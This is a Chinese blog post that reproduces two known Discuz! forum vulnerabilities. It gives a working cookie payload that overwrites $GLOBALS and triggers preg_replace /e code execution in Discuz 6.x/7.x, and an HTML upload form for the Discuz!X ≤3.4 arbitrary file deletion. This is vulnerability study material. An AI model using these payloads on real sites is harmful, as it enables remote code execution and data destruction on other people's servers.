Discuz

最新推荐文章于 2021-03-23 23:39:07 发布
最新推荐文章于 2021-03-23 23:39:07 发布
阅读量386 收藏
点赞数
文章标签: Discuz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiwangyizhicunzai/article/details/84205192
版权
Discuz 7.x/6.x 全局变量防御绕过导致代码执行

这是一个非常知名,历史漏洞也比较多的cms。
由于php5.3.x版本里php.ini的设置里request_order默认值为GP(只包含get和post,不包含cookie),导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

核心利用代码:
include/discuzcode.func.php中的

$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

利用:
在一个已发布的帖子的请求的cookie字段中,添加如下payload来更改全局变量的值

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

在这里插入图片描述

Discuz!X ≤3.4 任意文件删除漏洞

看了一些文章,这个漏洞是由unlink函数引发的,函数参数中拼接了个人设置中的一些数据,但是要进入目标unlink函数,需要上传一张图片,将个人设置中的参数放入表单中。
在这里插入图片描述
可见需要上传一张图片才能进入逻辑,
在这里插入图片描述
这里直接用robots.txt进行测试
在这里插入图片描述
审查元素中找到formhash,
在这里插入图片描述
提交后,刷新页面,出生地已经修改成功
在这里插入图片描述
构造上传页面,任意上传一张图片

<html>
<body>
    <form action="http://your-ip/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=7d2c5f8d" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>
</html>

在这里插入图片描述
此事个人设置也发生了改变
在这里插入图片描述

reference:
https://www.secpulse.com/archives/2338.html
https://lorexxar.cn/2017/09/30/dz-delete/
https://bbs.pediy.com/thread-221723.htm

xiwangyizhicunzai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php7全局变量漏洞,Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
weixin_42361708的博客
03-12 316
漏洞概述:由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。漏洞分析:include/global.func.php代码里:functiondaddslashes($string,$force=0){!defined('MAGIC_QUOTES_GPC')&&define(...
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
qq_41048303的博客
12-05 2335
1.漏洞原理 ​ 由于php5.3 x版本里php.ini的设置request_order默认值为GP,导致Discuz 6.x/7.x全局变量防御绕过漏洞。 2.漏洞环境 ​ 执行docker-compose up -d 启动后,访问http://192.168.254.202:8080/install来安装discuz ​ 数据库地址db,数据库名为discuz,数据库账号密码均为root 3.漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCA
Discuz 7.x、6.x 全局变量防御绕过导致代码执行
浅笑996的博客
11-25 1141
0x01 分析 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致REQUEST中不再包含_REQUEST中不再包含R​EQUEST中不再包含_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 具体原理请参考: https://www.secpulse.com/archives/2338.html 0x02 环境...
discuz模板
06-20
Discuz! 模板是基于Discuz! 论坛系统的一种视觉设计,它定义了用户在论坛、门户、社区等不同模块中看到的界面样式。本压缩包中的“xinyun_door_001”模板专为Discuz! X3.1和X3.2版本设计,提供了一种美观且功能完善...
Discuz用户充值积分支付插件_开通会员用户组支付_discuz积分充值免签支付插件.zip
09-08
Discuz用户充值积分支付插件与会员用户组支付详解》 Discuz是一款知名的社区论坛系统,它提供了丰富的功能和高度可定制性,使得许多网站能够建立自己的互动社区。在Discuz论坛运营过程中,积分系统是提升用户活跃...
Discuz-7.0.0
最新发布
09-24
Discuz! 7.0.0:搭建与配置指南》 Discuz! 是一款知名的开源社区论坛软件,由康盛创想(Comsenz)公司开发,深受广大站长喜爱。其中,Discuz! 7.0.0 版本在2009年发布,是该系列的重要版本,它提供了丰富的功能和...
Discuz论坛包
01-11
1. **模块化设计**:Discuz采用模块化架构,将论坛功能划分为不同的模块,如用户模块、帖子模块、分类信息模块等,这使得开发者可以更方便地对特定功能进行修改和扩展。 2. **模板系统**:Discuz支持自定义模板,...
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
aixuan9365的博客
05-29 235
参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html 文件位于:include/discuzcode.func.php 第97-241行 函数 discuzcode() 有这么一句话,$GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['...
buuctf [Discuz]wooyun-2010-080723
qq_1873822的博客
03-23 1536
漏洞描述 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。 https://www.secpulse.com/archives/2338.html https://www.freebuf.com/articles/web/226207.html 漏洞复现 http://node3.buuoj.cn:28226/install/来安装di
一个PHP正则相关的“经典漏洞” preg_replace
3569
01-02 7453
https://www.cdxy.me/?p=756小密圈《代码审计》中看到P神发的“经典漏洞”,关于写配置文件这个功能点。问题代码 $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|',"\$optio

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值